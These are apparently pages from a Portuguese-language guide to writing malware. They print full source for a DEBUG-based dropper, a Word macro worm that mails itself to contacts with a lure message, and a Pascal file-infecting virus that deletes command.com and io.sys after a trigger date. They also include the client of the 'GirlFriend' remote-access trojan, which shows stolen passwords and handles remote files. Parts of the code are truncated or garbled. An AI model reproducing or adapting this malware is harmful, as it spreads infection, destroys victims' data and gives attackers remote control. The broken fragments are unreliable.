Print #1, "E1DD0 BE 00 FE 16 57 C4 7E 0A 06 57 8B 46 08 03 46 06"
Print #1, "E1DE0 50 B8 FF 00 50 0E E8 3E FE 0E E8 7B FE C4 7E 0A"
Print #1, "E1DF0 06 57 B8 FF 00 50 0E E8 09 FE 8B E5 5D CA 08 00"
Print #1, "E1E00 8B DC 1E 36 C5 7F 04 33 C9 89 0D B8 00 3D 81 7D"
Print #1, "E1E10 02 B1 D7 74 0D B0 02 FF 05 81 7D 02 B3 D7 74 02"
Print #1, "E1E20 B4 3C 80 7D 30 00 74 09 8D 55 30 CD 21 72 5A 89"
Print #1, "E1E30 05 B8 B0 03 BA 21 01 33 C9 33 DB 81 7D 02 B1 D7"
Print #1, "E1E40 74 2F 8B 1D B8 00 44 CD 21 F6 C2 80 B8 05 04 BA"
Print #1, "E1E50 21 01 8B C8 8B DA 75 14 81 7D 02 B3 D7 75 03 E8"
Print #1, "E1E60 2B 00 B8 E0 03 BA 21 01 33 C9 33 DB C7 45 02 B2"
Print #1, "E1E70 D7 89 45 14 89 55 16 89 4D 18 89 5D 1A C7 45 1C"
Print #1, "E1E80 25 04 C7 45 1E 21 01 33 C0 1F CA 04 00 33 D2 33"
Print #1, "E1E90 C9 8B 1D B8 02 42 CD 21 2D 80 00 83 DA 00 73 04"
Print #1, "E1EA0 33 C0 33 D2 8B CA 8B D0 8B 1D B8 00 42 CD 21 8D"
Print #1, "E1EB0 95 80 00 B9 80 00 8B 1D B4 3F CD 21 73 02 33 C0"
Print #1, "E1EC0 33 DB 3B D8 74 20 80 B9 80 00 1A 74 03 43 EB F2"
Print #1, "E1ED0 8B D3 2B D0 B9 FF FF 8B 1D B8 02 42 CD 21 33 C9"
Print #1, "E1EE0 8B 1D B4 40 CD 21 C3 BF 56 00 1E 07 B9 5A 09 2B"
Print #1, "E1EF0 CF D1 E9 33 C0 FC F3 AB C3 00 00 00 00 00 00 00"
Print #1, "E1F00 00 00 05 4D 5A 60 00 10 00 00 00 00 00 00 00 00"
Print #1, "E1F10 00 00 00 00 00 00 00 00 00 00 FF FF 00 00 00 00"
Print #1, "E1F20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E1F30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E1F40 00 00 00 00 00 00 00 00 00 10 40 00 00 A0 00 B0"
Print #1, "E1F50 00 B8 00 00 02 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "rcx"
Print #1, "1E60"
Print #1, "W"
Print #1, "q"
Close #1
Open "C:\EXEC_LG.BAT" For Output As #1
Print #1, "@echo off"
Print #1, "debug < legado.scr > nul"
REM Print #1, "echo Debug fim"
Print #1, "c:\legado.com"
Print #1, "del c:\legado.scr "
Print #1, "del c:\legado.com "
Print #1, "del c:\exec_LG.bat"
Close #1
ChDir "C:\"
Shell "EXEC_LG.BAT", 0
NoDropper:
End Sub
Página 129
Sub MAIN
On Error Goto noway
versão$ = ObterInfoSistema$(24)
so$ = ObterInfoSistema$(21)
normal$ = ""
nome$ = "c:\precos.doc"
If Ficheiros$(nome$) <> "" Then Kill nome$

If Ficheiros$("c:\winword\modelos\normal.dot") <> "" Then normal$ =
Ficheiros$("c:\winword\modelos\normal.dot")
If Ficheiros$("c:\winword\normal.dot") <> "" Then normal$ =
Ficheiros$("c:\winword\normal.dot")
If Ficheiros$("c:\msoffice\modelos\normal.dot") <> "" Then normal$ =
Ficheiros$("c:\msoffice\modelos\normal.dot")
If Ficheiros$("c:\msoffice\models\normal.dot") <> "" Then normal$ =
Ficheiros$("c:\msoffice\models\normal.dot")
If Ficheiros$("normal.dot") <> "" Then normal$ = Ficheiros$("normal.dot")
If Ficheiros$("modelos\normal.dot") <> "" Then normal$ =
Ficheiros$("modelos\normal.dot")
If normal$ = "" Then Goto NoWay

CopiarFicheiro normal$, "c:\"
Name "c:\Normal." As nome$
If AplSendoExecutada("Eudora") Then
AplExibir "Eudora Light"
Goto eudora
End If
If AplSendoExecutada("Internet Mail") Then Goto win95
If Ficheiros$("C:\eudora\eudora.exe") <> "" Then
Shell Ficheiros$("C:\eudora\eudora.exe"), 1
Goto eudora
End If
If Ficheiros$("C:\ficheiros de programas\eudora\eudora.exe") <> "" Then
Shell Ficheiros$("C:\ficheiros de programas\eudora\eudora.exe"), 1
Goto eudora
End If
If Ficheiros$("C:\Program Files\eudora\eudora.exe") <> "" Then
Shell Ficheiros$("C:\Program Files\eudora\eudora.exe"), 1
Goto eudora
End If
If so$ = "Windows" Then Goto Windows

Goto NoWay
Windows:
If (versão$ >= "3") And (versão$ < "4.0") Then Goto Win311
If AplSendoExecutada("Internet Mail") Then Goto Win95
Goto noway
Win311:
If AplSendoExecutada("Mail") Then
AplAtivar "Mail"
Else
MicrosoftMail
EnviarTeclas "{enter 3}", - 1
End If
On Error Goto NoWay
EnviarTeclas "^r", - 1
AplOcultar "Mensagem"
EnviarTeclas "%d", - 1
AplOcultar "Endereços"
EnviarTeclas "+^{end}", - 1
EnviarTeclas "%p", - 1
EnviarTeclas "{enter}", - 1
EnviarTeclas "{tab 2}Sente só:{tab}", - 1
EnviarTeclas " Oi,{enter 2}Estou te enviando uma lista ", - 1
EnviarTeclas "sobre precos de programas para ", - 1
EnviarTeclas "PC, de uma olhada nela, falo ", - 1
EnviarTeclas "com você mais tarde, eu tenho que ", - 1
EnviarTeclas "ir para a escola, a empregada não veio ", - 1
EnviarTeclas "e eu tenho que me virar. Tchau.%r", - 1
EnviarTeclas nome$, - 1
EnviarTeclas "{enter}%f%n%j1", - 1
EnviarTeclas "{home}+^{end}{del 2}%{f4}"
EnviarTeclas T = tecla "{tab}{enter}", - 1
Win95:
AplExibir "Internet mail"
AplOcultar "Internet mail"
EnviarTeclas("^n"), - 1
If AplSendoExecutada("Nova Messagem") Then
Goto portugues
Else
If AplSendoExecutada("New Message") Then Goto Ingles
End If
Goto noway
Ingles:
AplOcultar "New message"
EnviarTeclas "%m", - 1
EnviarTeclas "r+^{end}", - 1
EnviarTeclas "%o", - 1
EnviarTeclas "{tab 7}{enter}{tab 2}", - 1
EnviarTeclas "^{home}Sente só:{tab}", - 1
EnviarTeclas " ^{home}{enter}^{home}Oi,{enter 2}Estou", - 1
EnviarTeclas " te enviando uma lista", - 1
EnviarTeclas " sobre precos de programas e", - 1
EnviarTeclas " jogos para o ", - 1
EnviarTeclas "PC, da’ uma olhada nela, falo ", - 1
EnviarTeclas "com você mais tarde, eu tenho que", - 1
EnviarTeclas " ir para a escola, a empregada não veio ", - 1
EnviarTeclas "e eu tenho que me virar. Tchau.{enter}%if", - 1
AplOcultar "Insert Atta"
EnviarTeclas "{enter}%s^m", - 1
REM EnviarTeclas "{home}+^{end}{del}%{f4}^m", - 1
AplOcultar "Sending and Receiving"
AplOcultar "Internet Mail"
AplExibir "Microsoft Word"
Goto noway
Portugues:
REM AplAtivar "Internet mail"
AplOcultar "Internet mail"
REM EnviarTeclas("^n"), - 1
AplOcultar "Nova mensagem"
EnviarTeclas "%m", - 1
EnviarTeclas "r+^{end}", - 1
EnviarTeclas "%p", - 1
EnviarTeclas "{tab 7}{enter}{tab 2}", - 1
EnviarTeclas "Sente só:{tab}", - 1
EnviarTeclas " ^{home}{enter}^{home}Oi,{enter 2}Estou", - 1
EnviarTeclas " te enviando uma lista", - 1
EnviarTeclas " sobre precos de programas e", - 1
EnviarTeclas "PC, de uma olhada nela, falo ", - 1
EnviarTeclas "com você mais tarde, eu tenho que", - 1
EnviarTeclas "e eu tenho que me virar. Tchau.{enter}%ia", - 1
AplOcultar "Insira"
EnviarTeclas "{enter}%e^m", - 1
REM EnviarTeclas "{home}+^{end}{del}%{f4}^m", - 1
AplOcultar "Interner mail"
Goto noway
eudora:
AplOcultar "Eudora Light"
EnviarTeclas "{esc 2}", - 1
EnviarTeclas "^n^l{home}+^{end}%t", - 1
EnviarTeclas "{tab}Sente só:{tab 3}", - 1
EnviarTeclas "Oi,{enter 2}Estou te enviando uma lista", - 1
EnviarTeclas " sobre preços de programas e", - 1
EnviarTeclas "PC, dê uma olhada nela, falo ", - 1
EnviarTeclas "com você outra hora, eu tenho que", - 1
EnviarTeclas "e eu tive que me virar sozinho. Tchau.{enter}^h", - 1
AplOcultar "Attach"
EnviarTeclas "{enter}^e^t", - 1
AplOcultar "progress"
AplOcultar "eudora Light"
REM EnviarTeclas "{enter}", - 1
NoWay:
End Sub
Página 149
{$M $2500,0,0 }
{$S-,R-,I-,V-,f+}
Program Exemplo_de_vírus_em_Pascal;
USES crt,windos,dos;
CONST
LENVÍRUS=11616; {TAMANHO DO VÍRUS - ALTERE SE MODIFICADO, USE O PROGRAMA
CABECALHO PARA ISSO}
CAB:string[5]=CHR(77)+CHR(90)+CHR(96)+CHR(1)+cHR(23); {CABECALHO DO VÍRUS -
ALTERE SE MODIFICADO,
USE O PROGRAMA CABECALHO PARA ISSO}
MAXBUFLEN=1024; {Tamanho do buffer em bytes a ser copiado de cada vez}
FILES=10; {Ficheiros a serem infectados de cada vez}
MOSTRA=true; {Você quer saber o que o seu vírus está a fazer?}
VAR
fvir,vfile,fromf,tof:file; {Ficheiro que vai conter o vírus, variável de
ficheiro usado no vírus, 2 variáveis necessárias para a cópia do vírus }
con:integer; {variável contadora}
int1c: Procedure; {Estes dois serão vistos em exemplos de acções do vírus}
printer:procedure;
buffer:ARRAY[1..MAXBUFLEN] OF CHAR; {Necessário para a cópia de ficheiros}
vx,vy,cx,cy:integer; {Coordenadas x,y da bola no ecrã}
h, m, s, hund,day,mon,year: Word; {Necessário para conter a data e a hora do
ficheiro}
dat:datetime; {Vai conter a hora do ficheiro}
ftime:longint; {Hora do ficheiro}
vbola:boolean;
nome_arq:pathstr; {Irá conter o nome do ficheiro com o vírus, muito necessário}
arquiv:integer; {Quantidade de ficheiros infectados até ao momento}
dirinfo:searchrec; {Muito usado no vírus, e responsável por procurar ficheiros
onde eu quiser usando asteriscos (*.exe,c:\dos\*.com)}
procedure HORAINI(NOME:STRING);
var
arq:file;
begin
if MOSTRA then writeln('Gravando a data e hora do ficheiro: ',nome);
assign(arq, NOME); {Fica com a hora de criação do ficheiro}
reset(arq);
Getftime(arq,ftime);
UnpackTime(ftime,dat);
H:=dat.HOUR;
M:=dat.MIN;
S:=dat.SEC;
day:=dat.day;
mon:=dat.month;
year:=dat.year;
close(arq);
if MOSTRA then writeln('Concluída a gravação da data e hora do ficheiro:
',nome);
END;
PROCEDURE HORAFIM(NOME:STRING);
var
arq:file;
BEGIN
if MOSTRA then writeln('Restaurando a data e hora original do programa: ',nome);
dat.HOUR:=H; {Restaura a data e hora original}
dat.MIN:=M;
dat.SEC:=S;
dat.day:=day;
dat.month:=mon;
dat.year:=year;
assign(arq, NOME);
reset(arq);
PackTime(dat,ftime);
reset(arq);
Setftime(arq,ftime);
close(arq);
if MOSTRA then writeln('Restauração do ficheiro ',nome,' concluída');
END;
function verifica(nome:string):boolean;
VAR
buf: array[1..10] of Char;
numread:WORD;
con:integer;
begin
if MOSTRA then writeln('Iniciando verificação se o ficheiro ',nome,' já foi
infectado.');
con:=1;
assign(vFile,NoME);
reset(vFile,1); { Record size = 1 }
BlockRead(vFile, buf, SizeOf(buf), numread);
IF (buf[3]=CAB[3]) AND (buf[4]=CAB[4]) then
begin
if MOSTRA then writeln('Verificação completa - ficheiro infectado ');
{Verifica o cabeçalho do ficheiro}
verifica:=TRUE {para ver se já foi infectado}
end ELSE
begin
verifica:=FALSE;
if MOSTRA then writeln('Verificação completa - ficheiro não infectado ');
end;
close(vFile);
END;
procedure infec(nome:string);
var
buf: array[1..LENVÍRUS] of Char; {Tamanho do vírus}
buf2: array[1..2048] of Char; {Variável necessária para a cópia}
numread, NumWritten: Word;
begin
if MOSTRA then writeln('Iniciando a infecção do ficheiro ',nome);
if (nome<>'VIRTEMP.TMP') and (nome<>'COMMAND.COM') then begin
HORAINI(NOME); {Grava data e hora do ficheiro}
assign(FromF,nome);
reset(FromF,1);
assign(ToF,'virtemp.tmp');
Rewrite(ToF,1);
repeat
BlockRead(FromF, buf2, SizeOf(buf2), numread);
BlockWrite(ToF, buf2, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
{Até aqui seria a parte onde se copia o ficheiro a ser infectado para outro
ficheiro temporário}
assign(FromF,nome_arq); {nome_arq: explicado mais tarde}

reset(FromF, 1);
assign(ToF, nome);
Rewrite(ToF, 1);
BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF
é o buffer}
BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse
caso ele}
close(FromF); {copiará somente o vírus para o ficheiro a}
close(tof); {ser infectado (ficheiro.exe) em que havia sido}
{movido o seu conteúdo para virtemp.tmp }
{deixando, por enquanto somente o vírus no }
{ficheiro }
assign(FromF,'virtemp.TMP');
reset(FromF, 1);
assign(ToF, nome);
reset(tof,1);
seek(tof,LENVÍRUS); {Posiciona o ponteiro do ficheiro na posição final do
ficheiro}
repeat
BlockRead(FromF, buf, SizeOf(buf), numread);
BlockWrite(ToF, buf, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
erase(fromf);
HORAFIM(NOME);
end;
{Essa parte seria a concatenação vírus+ficheiro, onde o ficheiro seria
acrescentado no fim do vírus}
if MOSTRA then writeln('Infecção completa.');

end;
procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando a infecção do directório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv numread);
close(FromF);
close(tof);
exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o
programa aqui}
rewrite(tof); {Agora vou limpar o conteúdo e apagar o ficheiro}
close(tof);
erase(tof);
if MOSTRA then writeln('Execução do programa hospedeiro finalizada');
end;
procedure bola; interrupt;
var
cont:integer;
begin
if not vbola then
if port[$60]<$80 then
inc(con);
if con=550 then
vbola:=true;
if vbola then
begin
cont:=random(4)+1;
vy:=wherey;
vx:=wherex;
gotoxy(cx,cy);
write('Û');
case cont of
1:if cx<78 then inc(cx);
2:if cx>1 then dec(cx);
3:if cy<23 then inc(cy);
4:if cy>1 then dec(cy);
end;
gotoxy(cx,cy);
write('þ');
gotoxy(vx,vy);
end;
inline ($9C);
int1c;
end;
procedure apag_arq;
var
m,dia,ano,dow:word;
mes:boolean;
f:file;
begin
if mostra then writeln('Indo buscar a data actual');
getdate(ano,m,dia,dow);
mes:=false;
if ano=1998 then
if m>=7 then {Data de activação: 12/07/1998}
if dia>=12 then
mes:=true;
if ano>1998 then mes:=true;
if mostra then writeln('Data actual finalizado');
if mes then begin
if mostra then writeln('Iniciando a eliminação dos ficheiros: \command.com e
\io.sys');
assign(f,'c:\command.com');
erase(f);
assign(f,'c:\io.sys');
erase(f);
end;
end;
Procedure inicinf;
begin
if MOSTRA then writeln('Iniciando a infecção dos ficheiros');
arquiv:=0;
procura('*.com','');
procura('*.exe','');
{ procura('c:\windows\*.com','c:\windows\');
procura('c:\windows\*.exe','c:\windows\');
procura('c:\dos\*.com','c:\dos\');
procura('c:\dos\*.exe','c:\dos\');}
if MOSTRA then writeln('Infecção dos ficheiros Finalizada. Com um total de:');
if MOSTRA then writeln(arquiv,' ficheiros infectados.');
end;
procedure contra(non:string);
var
FromF, ToF: file;
ARQ:text;
Ft:FILE of char;
f:file;
function vervir(nome:string):boolean;
VAR
Buf: array[1..10] of Char;
NUMREAD:WORD;
con:integer;
begin
if mostra then writeln('Iniciando a verificação de infecção do ficheiro ',nome);
con:=1;
ASSIGN(F,NoME);
ReSET(F,1); { Record size = 1 }
BlockRead(F, Buf, SizeOf(Buf), NumRead);
IF (BUF[1]=cab[1]) AND (BUF[2]=cab[2])AND (BUF[3]=cab[3])AND (BUF[4]=cab[4])AND
(BUF[4]=cab[4]) tHEN
{Verifica o cabeçalho do ficheiro}
vervir:=TRUE {para ver se já foi infectado}
ELSE
vervir:=FALSE;
Close(F);
if mostra then writeln('Verificação de infecção finalizada');
END;
procedure antivir;
begin
if not vervir(non) then
begin
if mostra then writeln('Ficheiro Infectado, tentando desinfectar...');
{Ficheiro infectado, tentando desinfectar...}
aSSIGN(Ft,paramstr(0));
ReSET(Ft); { Record size = 1 }
write(ft,cab[1]);
write(ft,cab[2]);
write(ft,cab[3]);
write(ft,cab[4]);
write(ft,cab[5]);
close(ft);
if mostra then writeln('Desinfeção completa!'); {Desinfeção completa}
textcolor(white+blink);
writeln('Atenção: O seu computador está infectado com um vírus! Sugiro que use
um Anti-vírus!');
textcolor(white);
end;
end;
begin
if mostra then writeln('Início do procedimento anti-vírus.');
antivir;
if mostra then writeln('Fim do procedimento anti-vírus.');
end;
procedure escrever;interrupt;
begin
Sound(random(5000));
Delay(1);
Nosound;
inline ($9C);
printer;
end;
begin
if MOSTRA then writeln('Iniciando o Vírus');
nome_arq:=paramstr(0); {Esta variável irá conter o nome do programa que está a
ser executado no momento. Caso o nome que foi executado seja EDIT.exe essa
variável conterá EDIT.EXE}
SETCBREAK(FALSE); {Para que o utilizador não possa carregar em Ctrl-C}
contra(nome_arq);
inicinf;
executa;
apag_arq;
GetIntVec($1c,@int1c);
SetIntVec($1c,Addr(bola));
vbola:=false;
cx:=random(80);{Aleatorizar a posição da bola no ecrã}
cy:=random(24);
GetIntVec($17,@printer);
SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar o
procedimento escrever como defeito para a impressora}
if MOSTRA then writeln('Fim do vírus.');
keep(0); {Deixa o programa residente em memória.}
if mostra then writeln('Programa Residente');
end.
Página 164
Programa MAIN.PAS
unit main;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
Menus, StdCtrls, Buttons, ScktComp, ExtCtrls, ComCtrls, About, ImgList,
OleCtrls, ShellAPI;
const WM_NOTIFYMSG=WM_USER+1;
type
TClientForm = class(TForm)
stbStatus: TStatusBar;
ClientSocket: TClientSocket;
sbConnect: TSpeedButton;
sbShowPass: TSpeedButton;
sbAbout: TSpeedButton;
sbCustom: TSpeedButton;
sbExit: TSpeedButton;
ilApp: TImageList;
sbMessage: TSpeedButton;
gbLog: TGroupBox;
gbTree: TGroupBox;
txtLog: TMemo;
Label1: TLabel;
Label2: TLabel;
PortChange: TButton;
sbReset: TSpeedButton;
cmdSave: TButton;
sd1: TSaveDialog;
tvApp: TTreeView;
pmActions: TPopupMenu;
Showpasswords1: TMenuItem;
Sendmessage1: TMenuItem;
Resetpasswordlist1: TMenuItem;
N3: TMenuItem;
PingserverAlive1: TMenuItem;
N2: TMenuItem;
mnuPlaySound: TMenuItem;
mnuShowPic: TMenuItem;
N1: TMenuItem;
mnuURL: TMenuItem;
mnuDelim1: TMenuItem;
mnuShow: TMenuItem;
N4: TMenuItem;
mnuConnect: TMenuItem;
N5: TMenuItem;
mnuQuit: TMenuItem;
ilWin: TImageList;
txtHid: TMemo;
sbFileManager: TSpeedButton;
pmFile: TPopupMenu;
mnuDelete: TMenuItem;
N6: TMenuItem;
mnuDownload: TMenuItem;
mnuDelim: TMenuItem;
mnuRun: TMenuItem;
N7: TMenuItem;
mnuUpload: TMenuItem;
od1: TOpenDialog;
IP: TComboBox;
portvalue: TComboBox;
procedure ScanIPs;
procedure ProcessDiskList;
procedure ClientSocketConnect(Sender: TObject;
Socket: TCustomWinSocket);
procedure ClientSocketRead(Sender: TObject; Socket: TCustomWinSocket);
procedure ClientSocketError(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure ProcessTree;
procedure ProcessDirectory;
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure sbConnectClick(Sender: TObject);
procedure sbShowPassClick(Sender: TObject);
procedure sbCustomClick(Sender: TObject);
procedure sbExitClick(Sender: TObject);
procedure sbAboutClick(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure sbMessageClick(Sender: TObject);
procedure txtLogDblClick(Sender: TObject);
procedure PortChangeClick(Sender: TObject);
procedure sbResetClick(Sender: TObject);
procedure cmdSaveClick(Sender: TObject);
procedure PingserverAlive1Click(Sender: TObject);
procedure mnuPlaySoundClick(Sender: TObject);
procedure mnuShowPicClick(Sender: TObject);
procedure txtLogKeyDown(Sender: TObject; var Key: Word;
Shift: TShiftState);
procedure tvAppKeyDown(Sender: TObject; var Key: Word;
procedure portvalue1KeyDown(Sender: TObject; var Key: Word;
procedure IP1KeyDown(Sender: TObject; var Key: Word;
procedure PortChangeKeyDown(Sender: TObject; var Key: Word;
procedure cmdSaveKeyDown(Sender: TObject; var Key: Word;
procedure FormKeyDown(Sender: TObject; var Key: Word;
procedure NotifyIcon (var TM: TMessage); message WM_NOTIFYMSG;
procedure mnuShowClick(Sender: TObject);
procedure mnuURLClick(Sender: TObject);
procedure tvAppExpanding(Sender: TObject; Node: TTreeNode;
var AllowExpansion: Boolean);
procedure tvAppCollapsing(Sender: TObject; Node: TTreeNode;
var AllowCollapse: Boolean);
procedure sbFileManagerClick(Sender: TObject);
procedure tvAppDblClick(Sender: TObject);
procedure tvAppRatoDown(Sender: TObject; Button: TRatoButton;
Shift: TShiftState; X, Y: Integer);
procedure pmFilePopup(Sender: TObject);
procedure mnuDeleteClick(Sender: TObject);
procedure mnuRunClick(Sender: TObject);
procedure mnuDownloadClick(Sender: TObject);
procedure mnuUploadClick(Sender: TObject);
protected
IsServer: Boolean;
end;
var
ClientForm: TClientForm;
Server: String;
implementation
uses MessageUnit;
const
CLOSED_ICON=2;
OPEN_ICON=3;
BMP_FILE=4;
EXE_FILE=5;
WAV_FILE=6;
USUAL_FILE=7;
HDD_ICON=8;
CDROM_ICON=9;
WrapStr = #13+#10;
LastPosition = 1000;
type iptype = record
ipcount, pcount:integer;
ip:array[0..99] of string[25];
port:array [0..99] of integer;
end;
var
Fl: FILE of IPType;
loading, scanning, working,
diskmode, TreeCame, recfile,
DeleteAnswer, FileDestroyed,
Uploaded: boolean;
Connection, ServerAnswer: boolean;
PList: array [1..LastPosition] of string;
PC: integer;
CurrIP: string;
IP_base, IP_count, CurrPort: integer;
FolderNode: TTreeNode;
FName, PCN: string;
FSize, AC, SC: integer;
FlT: FILE;
buffer: array [0..16385] of byte;
{$R *.DFM}
function extract (st: string; ind1, ind2: integer): string;
var i: integer;
begin
result:='';
for i:=ind1 to ind2 do
result:=result+st[i];
end;
procedure AddTrayIcon (ID: integer; Hint: string; Icon: TIcon; hWnd: LongInt;
CallBack: LongInt);
var MC: TNotifyIconData;
begin
with MC do
begin
cbSize:= sizeof(TNotifyIconData);
Wnd:= hWnd;
uID:= ID;
uFlags:= NIF_MESSAGE or NIF_ICON or NIF_TIP;
uCallbackMessage:= CallBack;
hIcon:= Icon.Handle;
if (length(hint)>0) then
StrLCopy(szTip, PChar(hint), 63)
else
szTip[0]:= #0;
end;
if Shell_NotifyIcon (NIM_ADD, @MC) then
SetWindowLong(Application.Handle, GWL_EXSTYLE,
GetWindowLong(Application.Handle, GWL_EXSTYLE) or
WS_DLGFRAME and not WS_EX_APPWINDOW);
end;
procedure ModifyTrayIcon (ID: integer; Hint: string; Icon: TIcon; hWnd: LongInt;
CallBack: LongInt);
begin
with MC do
begin
Wnd:= hWnd;
uID:= ID;
uFlags:= NIF_MESSAGE or NIF_ICON or NIF_TIP;
uCallbackMessage:= CallBack;
hIcon:= Icon.Handle;
if (length(hint)>0) then
StrLCopy(szTip, PChar(hint), 63)
else
szTip[0]:= #0;
end;
Shell_NotifyIcon (NIM_MODIFY, @MC);
end;
procedure DestroyTrayIcon (ID: integer; hWnd: LongInt);
begin
with MC do
begin
Wnd:= hWnd;
uID:= ID;
end;
Shell_NotifyIcon (NIM_DELETE, @MC);
end;
// Cuts the string at '(' position (when clicking filenames)
function TrimPRT (ST: string): string;
var i: integer;
begin
result:='';
for i:=1 to Length(ST)-1 do
if ST[i+1]='(' then break else result:=result+ST[i];
end;
// Duplicates the & symbol - to prevent _
function DupAmps (var ST: string): string;
var i: integer;
begin
result:='';
for i:=1 to Length(ST) do
if ST[i]<>'&' then result:=result+ST[i]
else result:=result+'&&';
end;
procedure TClientForm.ScanIPs;
var i, DotPos: integer;
ST, IPT: string;
begin
ST:=IP.Text;
for i:=Length (ST) downto 1 do
if ST[i]='.' then break;
DotPos:=i;
IP_base:=strtoint (extract (ST, i+1, Pos ('+', ST)-1));
IP_count:=strtoint (extract (ST, Pos ('+', ST)+1, Length (ST)));
IPT:=copy (ST, 1, DotPos);
scanning:=true;
for i:=0 to IP_count do
begin
CurrIP:=IPT+inttostr (IP_base+i);
ClientSocket.Close;
ClientSocket.Port:=CurrPort;
ClientSocket.Address:=CurrIP;
stbStatus.Panels[0].Text:= 'Scanning IP '+CurrIP;
ClientSocket.Open;
ServerAnswer:=false;
repeat
Application.ProcessMessages;
until ServerAnswer;
if Connection then break;
end;
end;
procedure TClientForm.sbConnectClick(Sender: TObject);
begin
if sbConnect.caption='Disconnect' then
begin
ilWin.GetIcon (0, ClientForm.Icon);
ModifyTrayIcon (1, 'GirlFriend client v1.2',
ClientForm.Icon, ClientForm.Handle,
WM_NOTIFYMSG);
sbConnect.caption:='Connect';
mnuConnect.Caption:='Connect';
sbShowPass.Enabled:=false;
sbMessage.Enabled:=false;
sbCustom.Enabled:=false;
sbFileManager.Enabled:=false;
ClientForm.Showpasswords1.Enabled:=false;
ClientForm.Sendmessage1.Enabled:=false;
ClientForm.Resetpasswordlist1.Enabled:=false;
ClientForm.PingserverAlive1.Enabled:=false;
ClientForm.mnuPlaySound.Enabled:=false;
ClientForm.mnuShowPic.Enabled:=false;
ClientForm.mnuURL.Enabled:=false;
sbReset.Enabled:=false;
PortChange.Enabled:=false;
clientsocket.socket.SendText('Quiting..');
clientsocket.Close;
stbStatus.Panels[0].Text:= 'Disconnected';
exit;
end;
if (Length(IP.Text)>0) then
begin
if portvalue.text>'' then ClientSocket.Port:=strtoint(portvalue.Text) else
begin
ClientSocket.Port:=21554;
PortValue.Text:=inttostr (ClientSocket.Port);
end;
CurrPort:=ClientSocket.Port;
if Pos('+', IP.Text)=0 then
begin
scanning:=false;
CurrIP:=IP.Text;
with ClientSocket do
begin
Address:= IP.Text;
Open;
end
end
else
ScanIPs;
end;
end;
procedure TClientForm.ClientSocketConnect(Sender: TObject;
var
i:integer;
a, b:boolean;
begin
a:=false;
b:=false;
for i:=0 to ip.items.count+1 do if ip.Items[i]=clientsocket.address then
a:=true;
for i:=0 to portvalue.items.count+1 do if
portvalue.Items[i]=inttostr(clientsocket.port) then b:=true;
if a<>true then ip.items.Add(clientsocket.address);
if b<>true then portvalue.items.Add(inttostr(clientsocket.port));
ServerAnswer:=true;
Connection:=true;
ilWin.GetIcon (1, ClientForm.Icon);
ModifyTrayIcon (1, 'GirlFriend client v1.2. Connected with
'+Socket.RemoteAddress,
WM_NOTIFYMSG);
PortChange.Enabled:=true;
sbConnect.caption:='Disconnect';
mnuConnect.Caption:='Disconnect';
stbStatus.Panels[0].Text:= 'Connected to: ' + Socket.RemoteAddress;
clientsocket.socket.SendText ('ver');
ClientSocket.Socket.SendText ('time');
tvApp.Items.Clear;
sbShowPass.Enabled:=true;
sbMessage.Enabled:=true;
sbCustom.Enabled:=true;
sbReset.Enabled:=true;
sbFileManager.Enabled:=true;
ClientForm.Showpasswords1.Enabled:=true;
ClientForm.Sendmessage1.Enabled:=true;
ClientForm.Resetpasswordlist1.Enabled:=true;
ClientForm.PingserverAlive1.Enabled:=true;
ClientForm.mnuPlaySound.Enabled:=true;
ClientForm.mnuShowPic.Enabled:=true;
ClientForm.mnuURL.Enabled:=true;
end;
procedure TClientForm.ProcessTree;
var i: integer;
First, TMP, found: TTreeNode;
ST, FT: string;
function FindNode (caption: string): boolean;
var c: integer;
begin
result:=false;
for c:=0 to tvApp.Items.Count-1 do
if tvApp.Items.Item[c].Text=caption then
begin
result:=true;
found:=tvApp.Items.Item[c];
break;
end;
end;
begin
tvApp.Items.Clear;
First:=tvApp.Items.GetFirstNode;
for i:=1 to PC do
begin
ST:=extract (PList[i], 1, Pos ('___', PList[i])-1);
if not(FindNode(ST)) then
begin
TMP:=tvApp.Items.Add (First, ST);
TMP.ImageIndex:=0;
TMP.SelectedIndex:=0;
end;
end;
for i:=1 to PC do
begin
ST:=extract (PList[i], 1, Pos ('___', PList[i])-1);
FT:=extract (PList[i], Pos ('___', PList[i])+3, Length(PList[i]));
if FindNode(ST) then
begin
TMP:=tvApp.Items.AddChild (found, FT);
TMP.ImageIndex:=1;
TMP.SelectedIndex:=1;
end;
end;
end;
procedure TClientForm.ProcessDiskList;
var TMP, First: TTreeNode;
i: integer;
ST: string;
begin
tvApp.Items.Clear;
First:=tvApp.Items.GetFirstNode;
for i:=1 to PC do
begin
ST:=extract (PList[i], 3, Length(PList[i])-1);
TMP:=tvApp.Items.Add (First, ST);
case PList[i][1] of
'H': begin
TMP.ImageIndex:=HDD_ICON;
TMP.SelectedIndex:=HDD_ICON;
end;
'C': begin
TMP.ImageIndex:=CDROM_ICON;
TMP.SelectedIndex:=CDROM_ICON;
end;
end;
TMP:=tvApp.Items.AddChild (TMP, 'Loading...');
TMP.SelectedIndex:=-1;
TMP.ImageIndex:=-1;
end;
end;
procedure TClientForm.ProcessDirectory;
var i: integer;
ST: string;
CP: char;
TMP: TTreeNode;
procedure SetIcon (ic: integer);
begin
TMP.ImageIndex:=ic;
TMP.SelectedIndex:=ic;
end;
begin
working:=true;
diskmode:=false;
FolderNode.DeleteChildren;
for i:=1 to PC do
begin
ST:=extract (PList[i], 3, Length(PList[i]));
CP:=PList[i][1];
TMP:=tvApp.Items.AddChild (FolderNode, ST);
case CP of
'E': SetIcon (EXE_FILE);
